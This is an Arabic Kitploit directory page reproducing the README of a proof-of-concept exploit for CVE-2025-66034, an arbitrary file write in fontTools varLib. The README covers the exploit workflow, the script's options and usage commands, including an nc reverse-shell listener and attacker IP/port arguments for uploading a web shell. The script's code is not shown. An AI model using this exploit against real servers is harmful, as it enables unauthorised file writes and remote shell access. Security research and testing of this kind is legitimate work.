Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
varlib-cve-2025-66034 — استغلال لإثبات المفهوم لثغرة CVE-2025-66034 في خط إنتاج توليد الخطوط المتغيرة في fontTools. يسمح ملف .designspace معدّ خصيصًا بالتحكم في مسار الإخراج، مما يتيح عمليات كتابة ملفات عشوائية. يقوم السكربت بأتمتة إنشاء الحمولة وتوليد الخطوط ورفعها لإثبات المشكلة. | Kitploit
أدوات/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

استغلال لإثبات المفهوم لثغرة CVE-2025-66034 في خط إنتاج توليد الخطوط المتغيرة في fontTools. يسمح ملف .designspace معدّ خصيصًا بالتحكم في مسار الإخراج، مما يتيح عمليات كتابة ملفات عشوائية. يقوم السكربت بأتمتة إنشاء الحمولة وتوليد الخطوط ورفعها لإثبات المشكلة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2منذ 10 أياملم تتم المراجعة بعد
مشاركة

استغلال CVE-2025-66034 في fontTools varLib

cve component vulnerability vector impact language dependency license

هذا المستودع لا يقدّم ثغرة أمنية جديدة.

هذا إثبات مفهوم (Proof-of-concept) لاستغلال CVE-2025-66034 الذي يؤثر على خط إنتاج الخطوط المتغيرة varLib في fontTools.

تسمح الثغرة للمهاجمين بالتحكم في اسم ملف الإخراج داخل ملف .designspace مُعدّ بعناية. عند معالجته بواسطة خدمة توليد خطوط معرّضة للخطر، يمكن أن يؤدي ذلك إلى كتابة ملفات عشوائية على نظام ملفات الخادم.

يعمل السكربت varlib_cve_2025_66034.py على أتمتة إنشاء الحمولة، وتوليد الخطوط، والرفع، وتشغيل الصدفة الاختياري.


الميزات

  • إنشاء تلقائي لخطوط رئيسية متوافقة باستخدام fontTools
  • توليد أسماء ملفات صدفة عشوائية
  • مسار هدف ونقطة رفع قابلة للتخصيص
  • مستمع nc تلقائي
  • لا حاجة لتجهيز خطوط يدويًا

المتطلبات

بايثون 3.9+

تثبيت التبعيات:

root@kitploit:~
pip install fonttools requests

Netcat مطلوب للمستمع، لذلك الأمر التالي مطلوب إذا كنت تستخدم خيار --no-listen:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

الاستخدام

إذا كان هدفك مختبرًا مستضافًا ذاتيًا يعمل على mysite.com، وكان مسار الرفع ومسار الكتابة على نظام الملفات ومسار التشغيل عبر الويب مطابقة للقيم الافتراضية في السكربت، يمكنك تشغيله مباشرة.

الاستخدام الأساسي:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

من المرجح جدًا أن الهدف يستخدم عناوين URL أو مسارات نظام ملفات مختلفة، لذا تجاوز القيم الافتراضية باستخدام الخيارات المتاحة أدناه، مثل --url و --path و --trigger أو عدّل السكربت يدويًا

ملاحظة: قد تختلف أسماء حقول نموذج الرفع متعدد الأجزاء (multipart) حسب البيئة. إذا كان الهدف لا يستخدم نفس أسماء حقول النموذج الموجودة في السكربت، فقم بتعديلها في قسم files قبل تشغيل الاستغلال.

الخيارات

الوسيطالوصف
--ipعنوان IP لمستمع المهاجم
--portمنفذ المستمع
--pathمسار نظام الملفات الهدف حيث سيتم كتابة الملف (يجب أن يكون قابلًا للوصول عبر الويب لتشغيل صدفة ويب)
--urlنقطة نهاية الرفع، قد يختلف النموذج
--triggerعنوان URL الأساسي المستخدم لتشغيل الحمولة المكتوبة بعد الرفع
--no-listenتعطيل مستمع netcat التلقائي

مثال مع خيارات مخصصة:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

سير عمل الاستغلال

  1. توليد خطوط رئيسية متوافقة
  2. إنشاء ملف .designspace خبيث
  3. رفع الحمولة عبر طلب POST متعدد الأجزاء
  4. كتابة ملف عشوائي على الخادم
  5. تشغيل الحمولة عبر طلب HTTP

الاعتمادات / الإشادات

شكر خاص وتقدير إلى:

  • مطوري ومُساهمي مشروع fontTools على عملهم في مكتبة fontTools مفتوحة المصدر.
  • باحثو الأمن الذين اكتشفوا وكشفوا بشكل مسؤول عن CVE-2025-66034.
  • مجتمع الأمن مفتوح المصدر لتوثيق وتحليل الثغرات التي تساعد في تحسين أمان البرمجيات.

يُقدَّم إثبات المفهوم هذا لأغراض تعليمية وبحثية للمساعدة في فهم الثغرة وتأثيرها.


إخلاء مسؤولية

هذا الكود مُقدَّم لأغراض تعليمية وبحثية فقط.

لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

المؤلف غير مسؤول عن سوء الاستخدام أو الأضرار الناجمة عن هذا البرنامج.


المراجع

  • تفاصيل CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • استشارة GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • مشروع fontTools: https://github.com/fonttools/fonttools
  • توثيق fontTools: https://fonttools.readthedocs.io/
تنزيل الأداة